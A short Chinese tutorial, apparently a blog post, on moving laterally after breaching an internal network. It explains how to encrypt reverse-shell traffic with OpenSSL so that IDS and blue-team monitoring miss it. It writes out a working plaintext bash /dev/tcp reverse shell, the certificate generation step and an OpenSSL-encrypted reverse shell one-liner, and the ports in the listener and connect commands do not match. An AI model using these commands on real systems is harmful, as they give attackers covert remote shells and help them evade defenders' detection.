介绍
通过外网打到服务器内网了,现在需要扩大我们的战果,进行横向移动,在进行横向移动的时候,大部分很多时候的工作都是进行反弹shell,或者是通过我们的msf,cs的一个马发过去进行连接,正常操作是这个样子是没问题的,但如果说对方的内网里有IDS这一类的流量审计的一些软件,如果不进行流量加密,极有可能触发警告,此时如果被蓝队人员发现,他就可以顺藤摸瓜进行溯源,并且这次攻击也会以失败告终,因为对方看到后会进行关闭一些端口以及ip。在内网中,反弹shell基本都是明文的,这就显现出了流量加密的重要性
开启加密之路
先来看看流量是怎么走的:
1. 攻击机kali:
nc -lvp 8899
2. 受害机centos7,将权限交给攻击机:
bash -i >& /dev/tcp/172.16.2.11/8899 0>&1
攻击机收到并可以执行命令
3. 打开wireshark,追踪tcp流:
这样子绝对会被拦截
什么是OpenSSL呢:
简单来理解就是https,和http不一样,http用wireshark抓包以后是明文的,抓https就是乱码的
比如说抓个百度的包
就是一堆乱码
配置攻击:
1.生成openSSL证书(攻击机) 开始配置:
一直回车就好,当然也可以自己填,伪造一下
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cer.pem -days 365 -nodes
这两个证书整好了以后,就可以进行加密监听了
2.攻击机kali加密监听:
openssl s_server -quiet -key key.pem -cert cer.pem -port 9999
3.受害机centos7反弹shell:
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 172.16.2.11:8080 > /tmp/s; rm /tmp/s
来到攻击机,接收到了一个shell,也是正常执行命令的
4.wireshark抓个包:
可以看到不管是哪一个包都是经过加密了的,这样就可以躲避ids的一个流量审计了
后持续更新反弹shell加密
MSF流量加密
CS生成证书是配置profile进行加密
CS域前置加密
腾讯云函数
......